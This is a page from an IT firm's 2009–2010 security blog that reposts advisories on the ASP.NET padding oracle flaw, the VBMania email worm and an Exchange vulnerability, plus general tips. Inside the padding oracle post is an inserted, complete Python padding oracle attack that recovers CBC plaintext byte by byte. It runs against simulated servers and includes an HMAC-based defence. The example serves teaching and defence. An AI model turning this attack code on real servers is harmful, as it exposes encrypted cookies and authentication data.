Out-of-Cycle Bulletin Fixes Serious ASP.NET Padding Oracle Vulnerability

Written on September 29th, 2010
Categories: Blog, Security, Servers

Excerpted from WatchGuard LiveSecurity Bulletin:


28 September, 2010


This vulnerability affects: All current versions of Microsoft’s .NET Framework

How an attacker exploits it: By sending a large number of web requests containing altered cipher text and interpreting the server’s error responses

Impact: In the worst case, an attacker can gain enough information to read and/or tamper with encrypted data from your web server

What to do: Install the proper .NET Framework update immediately (Windows Update will not push this update automatically at first; download and install it manually)


At the Eurocrypt conference in 2002, researcher Serge Vaudenay described a cryptographic “side-channel” attack, the padding oracle attack, which lets an attacker decrypt data encrypted in Cipher Block Chaining (CBC) mode without knowing the encryption key. Without getting into too much technical detail: a block cipher processes data in fixed-size blocks (eight bytes for DES and 3DES, sixteen for AES), so every message must be a whole number of blocks long. The plain text messages you encrypt come in varying lengths, so the encryption routine appends padding to fill out the last block, and the decryption routine checks that the padding is well formed before stripping it. If an attacker can tell whether that check passed or failed (for example, because the server returns a different error for bad padding than for any other failure), the server has become a “padding oracle.” Vaudenay showed that by sending many deliberately altered ciphertexts and watching the oracle’s answers, an attacker can recover the plaintext one byte at a time, with no knowledge of the key. In 2010, researchers Juliano Rizzo and Thai Duong released a tool, the Padding Oracle Exploit Tool (POET), that automates this class of attack.
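The attack described above, carried through end to end as an added example (this code is not from the bulletin or from the POET tool). A toy 16-byte Feistel block cipher built on SHA-256 stands in for AES so that the script runs on the Python standard library alone; the attack only needs CBC mode and an oracle that reveals whether decryption produced valid padding, so the choice of block cipher does not matter. The keys, the sample plaintext and the two simulated servers (`make_padding_oracle`, `make_authenticated_oracle`) are all constructed here for illustration:

```python
import hashlib, hmac, os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # round function: keyed SHA-256, truncated to a half block
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    # Toy 8-round Feistel cipher standing in for AES (needs only the standard
    # library); the attack further down does not depend on the cipher used.
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(8):
        l, r = r, xor(l, _f(key, r, i))
    return l + r

def block_decrypt(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(8)):
        l, r = xor(r, _f(key, l, i)), l
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK  # PKCS#7: n copies of the byte n
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def split_blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def cbc_encrypt(key, plaintext, iv=None):
    prev = iv or os.urandom(BLOCK)
    out = [prev]
    for block in split_blocks(pad(plaintext)):
        prev = block_encrypt(key, xor(block, prev))
        out.append(prev)
    return b"".join(out)  # IV || C1 || C2 || ...

def cbc_decrypt(key, ciphertext):
    blocks = split_blocks(ciphertext)
    return unpad(b"".join(xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))

def make_padding_oracle(key):
    # Vulnerable server: a padding failure is distinguishable from success.
    def oracle(ciphertext):
        try:
            cbc_decrypt(key, ciphertext)
        except ValueError:
            return False
        return True
    return oracle

def encrypt_then_mac(key, mac_key, plaintext, iv=None):
    body = cbc_encrypt(key, plaintext, iv)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()

def make_authenticated_oracle(key, mac_key):
    # Hardened server: HMAC is verified before decrypting, so every tampered message
    # gets the same rejection and the padding check is never reached.
    def oracle(ciphertext):
        body, tag = ciphertext[:-32], ciphertext[-32:]
        if not hmac.compare_digest(hmac.new(mac_key, body, hashlib.sha256).digest(), tag):
            return False
        return make_padding_oracle(key)(body)
    return oracle

def attack_block(oracle, prev, target):
    # Recover one plaintext block with at most 256 oracle queries per byte and no
    # key: forge the block in front of `target` until the result is valid padding.
    inter = bytearray(BLOCK)  # raw block decryption of target, learned right to left
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval  # bytes already known are steered to padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # False-hit check (e.g. \x02\x02): genuine \x01 padding stays valid
                # when the byte in front of it is changed.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted a forgery: no padding oracle")
    return xor(bytes(inter), prev)

def attack(oracle, ciphertext):
    blocks = split_blocks(ciphertext)
    return unpad(b"".join(attack_block(oracle, p, c) for p, c in zip(blocks, blocks[1:])))
```

`attack(make_padding_oracle(key), ct)` recovers the plaintext of `ct` with at most 256 queries per byte (4,096 per 16-byte block in the worst case), which is why the bulletin speaks of a large number of web requests. Against `make_authenticated_oracle`, which verifies an HMAC over the IV and ciphertext before decrypting, every forged message is rejected identically and the attack raises `RuntimeError` on the very first byte: what closes the hole is removing the oracle (authenticate before decrypting, and give all failures one indistinguishable response), not changing the padding.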

More recently, at the Ekoparty security conference in Argentina, two security researchers, Juliano Rizzo and Thai Duong, showed that Microsoft ASP.NET is vulnerable to this classic padding oracle attack. Specifically, the padding oracle is in the framework itself rather than in any one application’s code, so it affects every ASP.NET web application. They demonstrated that attackers can use the flaw to decrypt cookies, ViewState, forms authentication tickets, membership passwords, user data, and anything else encrypted using the ASP.NET framework’s API. As a result of these researchers’ findings, Microsoft decided to release an out-of-band security update to correct the issue.

According to Microsoft’s out-of-band security bulletin, the ASP.NET components that ship with the .NET Framework suffer from an information disclosure vulnerability due to a padding oracle flaw like the one described above. By repeatedly sending web requests containing altered cipher text to a vulnerable ASP.NET web server and interpreting the error responses it returns, an attacker could eventually gain enough information to read or tamper with encrypted data. This would allow the attacker to obtain significant amounts of sensitive information from your web server, and the researchers also demonstrated how this leak could be chained into a further attack that potentially gives full access to the server.

Researchers have already released tools and shared examples showing how to exploit this vulnerability, and Microsoft has seen evidence of attackers using the flaw in the wild. If you have a web server using the .NET Framework, we highly recommend you update it immediately.

For more technical detail about this flaw, check out the articles in the References section below.


Microsoft has released .NET Framework updates to fix this vulnerability. If you have web servers that use the .NET Framework, you should download, test and deploy the corresponding update immediately.

Email Worm Making Headlines

Written on September 13th, 2010
Categories: Blog, Security

Excerpted from WatchGuard LiveSecurity Bulletin:

“Here you have” Email contains fake and malicious PDF or WMV links

Severity: Medium

10 September, 2010

Virus/Worm Summary:

  • Subject lines to watch for: “Here you have,” “Just for you,” and “This is the Free Dowload (sic) Sex Movies, you can find it Here”
  • Malicious content: the email body contains what appear to be links to PDF or WMV files, which actually point to malicious .SCR (screensaver executable) files
  • Impact: Spreads via your email contacts and through network shares. Infects your computer with various malware, and potentially steals information
  • What to do: Make sure you are using updated antivirus software, and block .SCR files at your gateway (see below for details)

About the Virus:

Late yesterday, various antivirus (AV) vendors began receiving reports of a new mass-mailing email worm, generally called VBMania, which arrives with various subjects including “Here you have.” Today, others in the press have jumped on the bandwagon and published many shrill reports [ 1 / 2 / 3 ] that describe this worm as an outbreak and suggest it has flooded inboxes worldwide. While we don’t doubt that attackers have aggressively seeded this malicious email using spamming techniques (and likely a botnet), we haven’t yet seen the worm in our own inbox. There are reports of it affecting some well-known companies. However, it doesn’t seem to be as widespread as the big worms of the past (Nimda, etc.). In fact, most AV companies still rate this worm as only a medium risk. While you should make yourself, and your users, aware of this new worm, it doesn’t offer reason for panic.

What you can do

  • As always, remind your users never to open unexpected attachments or click on unexpected web links from any source. Inform them that most modern viruses falsify the “From” field and can appear to come from friends, co-workers, or other trusted parties.
  • Most major antivirus vendors already have signatures that detect this worm. Check with your vendor for the latest update. 

 - This alert was researched and written by Corey Nachreiner, CISSP

Additional Resources

If you currently do not have a robust security solution, you can learn more about STG’s network security solutions, including managed virus protection here:

Is your wireless network secure?

Written on July 23rd, 2010
Categories: Blog, Networking, Security

Google’s Street View is back in the news. Back in May, Google admitted that the technology it used to take images with its Street View cars may have inadvertently gathered private information from unsecured wireless (Wi-Fi) networks. An article from PCWorld stated that the nonprofit Consumer Watchdog claims to have “retraced some of the routes taken by Google’s Street View cars, and found that four residences of U.S. Congress members it checked had vulnerable networks, according to a BBC report. One of them was Congressman Henry Waxman, chairman of the Energy and Commerce Committee, which has jurisdiction over Internet issues.”

Read the rest of this entry »

Microsoft offers online backup for your phone

Written on June 11th, 2009
Categories: Blog

I’ve read that an estimated 12 million mobile devices are lost or stolen every year in the US. What would happen if you lost your mobile device? Would you just shrug your shoulders and be OK because you were wanting to get a new phone anyway? Or would you freak out because you now don’t know how to get in touch with anyone and don’t know where you have to be and don’t know how to get there? And those great pictures you took of your family that you had been meaning to download are now lost forever. Well, if you have a Windows Mobile Device, Microsoft has come to the rescue with a free online backup solution for your smart phone.

Read the rest of this entry »

Beware of Spoofing

Written on April 14th, 2009
Categories: Blog, Security

ABC News had a story about Caller ID spoofing on last night’s broadcast. It highlighted the technology that allows people to pay for a service that lets the caller choose the name and phone number the Caller ID will display, and even alter the sound of the caller’s voice. The technology that allows this to work is not new. Back in 2006 the House and Senate held hearings on the phenomenon but did not pass any legislation against the practice. According to ABC News, Florida is the only state in the US that has a law against Caller ID spoofing.

Read the rest of this entry »

E-mail Etiquette Tips

Written on April 10th, 2009
Categories: Blog

I write and receive dozens of emails a day. Emailing has become the preferred means of communication for many individuals and businesses. Since this method of communication is so prevalent in our lives, why not make the experience a bit more pleasant and follow a few email etiquette rules? These “rules” are not set in stone and you will not be whipped with a wet piece of spaghetti if you break them, but the recipients of your emails will really appreciate your efforts to stick to them.
1. Read and proof your email before you hit ‘send’. You will catch a lot of typos and may often find mistakes that your spell checker did not catch (e.g. ‘there’ vs. ‘their’).
2. Use punctuation. Though email is less professional than a business letter – it is more professional than a text message. Please remember to use commas, apostrophes and periods. Not doing so may distort your meaning and makes it more difficult for the recipient to read.
3. TYPING IN ALL CAPS LOOKS LIKE YOU ARE SHOUTING TO THE READER. Though it may be more convenient not to have to hit that Shift key at the beginning of a sentence, make the extra effort to only use capital letters when appropriate: formal names, states, countries… and many mail programs will automatically capitalize the 1st letter of a sentence for you (even on smart phones).
4. Be careful when you are trying to convey sarcasm or irony in your email. It’s difficult to pull off sarcasm without the context of facial expressions and the tone of your voice. You don’t want your email to offend or spark some conflict because you meant to be ironic and the reader thought you were being serious.

April 1st Virus fears are over-inflated

Written on March 27th, 2009
Categories: Blog, Security

All week I have had questions from people regarding the news they heard about a virus attack that was set to go off on April 1st. Well, to me, it has become a very widespread April Fool’s joke. And I am not the only one who thinks so. There are several large security companies out there that agree.

Read the rest of this entry »

Featured Article: Advances in Mobility

Written on March 11th, 2009
Categories: Blog, Mobility

Remember the days when you had to go to an office to work?

Not anymore!

The world seems to be the workplace for more and more people as advancements in mobility, computing power and security change the way we do business. But could it really be true that one day a majority of people will do everything from paying bills, researching information, updating their status, planning a night on the town, monitoring their children and responding to emails from a mobile device that oh, by the way, can also be used as a phone?

Read the rest of this entry »

Use keyboard shortcuts to save time

Written on February 27th, 2009
Categories: Blog

Everyone is always looking for helpful tips to make their computing easier and quicker. Here’s one for you… shortcut keys! These are universal keyboard combinations and can be used in your Windows environment throughout most (if not all) applications installed on your PC. Here’s a list of keyboard combinations that should help speed things up for you… try them out and I think you’ll see that you’ll like using them.

Cut – CTRL + X
Copy – CTRL + C
Paste – CTRL + V
Undo – CTRL + Z
Bold – CTRL + B
Italic – CTRL + I
Underline – CTRL + U
Select All – CTRL + A
Print – CTRL + P
Save – CTRL + S

Security Update: Exchange

Written on February 10th, 2009
Categories: Blog, Security

Maliciously Crafted Email Can Pwn Your Exchange Server
Severity: High
10 February, 2009

This vulnerability affects: All current versions of Exchange Server

How an attacker exploits it: By sending a specially crafted email (no user interaction necessary)

Impact: An attacker can potentially gain control of your Exchange Server

What to do: Deploy the appropriate Exchange Server patch immediately

Exposure: Microsoft Exchange is one of the most popular email servers used today.

Read the rest of this entry »